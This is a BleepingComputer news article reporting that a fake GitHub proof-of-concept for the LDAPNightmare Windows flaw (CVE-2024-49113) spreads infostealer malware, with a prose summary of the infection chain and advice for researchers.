Fake LDAPNightmware exploit on GitHub spreads infostealer malware – BleepingComputer
Treasury hackers also breached US foreign investments review officeFake LDAPNightmware exploit on GitHub spreads infostealer malwareScammers file first — Get your IRS Identity Protection PIN nowNew Web3 attack exploits transaction simulations to steal cryptoPhishing texts trick Apple iMessage users into disabling protectionPastor who saw crypto project in his “dream” indicted for fraudGet Office 2024 at a discount for $159.97 in this dealScammers file first — Get your IRS Identity Protection PIN nowHow to access the Dark Web using the Tor BrowserHow to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11How to use the Windows Registry EditorHow to backup and restore the Windows RegistryHow to start Windows in Safe ModeHow to remove a Trojan, Virus, Worm, or other MalwareHow to show hidden files in Windows 7How to see hidden files in WindowsRemove the Theonlinesearch.com Search RedirectRemove the Smartwebfinder.com Search RedirectHow to remove the PBlock+ adware browser extensionRemove the Toksearches.xyz Search RedirectRemove Security Tool and SecurityTool (Uninstall Guide)How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundoHow to remove Antivirus 2009 (Uninstall Instructions)How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKillerLocky Ransomware Information, Help Guide, and FAQCryptoLocker Ransomware Information Guide and FAQCryptorBit and HowDecrypt Information Guide and FAQCryptoDefense and How_Decrypt Ransomware Information Guide and FAQQualys BrowserCheckSTOPDecrypterAuroraDecrypterFilesLockerDecrypterAdwCleanerComboFixRKillJunkware Removal TooleLearningIT Certification CoursesGear + GadgetsSecurityBest VPNsHow to change IP addressAccess the dark web safelyBest VPN for YouTubeA deceptive proof-of-concept (PoC) exploit for CVE-2024-49113 (aka “LDAPNightmare”) on GitHub infects users with infostealer malware that exfiltrates sensitive data to an external FTP server.The tactic isn’t novel, as there have been multiple documented cases of malicious tools disguised as PoC exploits on GitHub.However, this case, discovered by Trend Micro, highlights that threat actors continue to use the tactic to trick unsuspecting users into infecting themselves with malware.Trend Micro reports that the malicious GitHub repository contains a project that appears to have been forked from SafeBreach Labs’ legitimate PoC for CVE-2024-49113, published on January 1, 2025.The flaw is one of the two impacting Windows Lightweight Directory Access Protocol (LDAP), which Microsoft fixed in its December 2024 Patch Tuesday, with the other being a critical remote code execution (RCE) problem tracked as CVE-2024-49112.SafeBreach’s initial blog post about the PoC wrongfully mentioned CVE-2024-49112, whereas their PoC was for CVE-2024-49113, which is a lower severity denial of service vulnerability.This mistake, even if corrected later, created higher interest and buzz around LDAPNightmare and its potential for attacks, which is probably what the threat actors attempted to take advantage of.Users downloading the PoC from the malicious repository will get a UPX-packed executable ‘poc.exe’ which, upon execution, drops a PowerShell script in the victim’s %Temp% folder.The script creates a scheduled job on the compromised system, which executes an encoded script that fetches a third script from Pastebin.This final payload collects computer information, process lists, directory lists, IP address, and network adapter information, as well as installed updates, and uploads them in ZIP archive form to an external FTP server using hardcoded credentials.A list of the indicators of compromise for this attack can be found here.GitHub users sourcing public exploits for research or testing need to exercise caution and ideally only trust cybersecurity firms and researchers with a good reputation.Threat actors have attempted to impersonate well-known security researchers in the past, so validating repository authenticity is also crucial.If possible, review the code before executing it on your system, upload binaries to VirusTotal, and skip anything that appears obfuscated.Banshee stealer evades detection using Apple XProtect encryption algoRaccoon Stealer malware operator gets 5 years in prison after guilty pleaMalicious ads push Lumma infostealer via fake CAPTCHA pagesCrypto-stealing malware posing as a meeting app targets Web3 prosExploit released for critical WhatsUp Gold RCE flaw, patch nowNot a member yet? Register NowMicrosoft to force install new Outlook on Windows 10 PCs in FebruaryProton worldwide outage caused by Kubernetes migration, software changeTelefónica confirms internal ticketing system breach after data leakCynet Delivers 100% Protection and 100% Detection Visibility in 2024 MITRE ATT&CK EvaluationPassword health-check overdue? Audit your Active Directory for freeCriminal IP: Real-Time Phishing Protection for Outlook UsersSave IT time with self-service password resetsProtecting Against Malicious Browser Extensions: The Complete GuideTerms of Use – Privacy Policy – Ethics Statement – Affiliate DisclosureCopyright @ 2003 – 2025 Bleeping Computer® LLC – All Rights ReservedNot a member yet? Register NowRead our posting guidelinese to learn what content is prohibited.
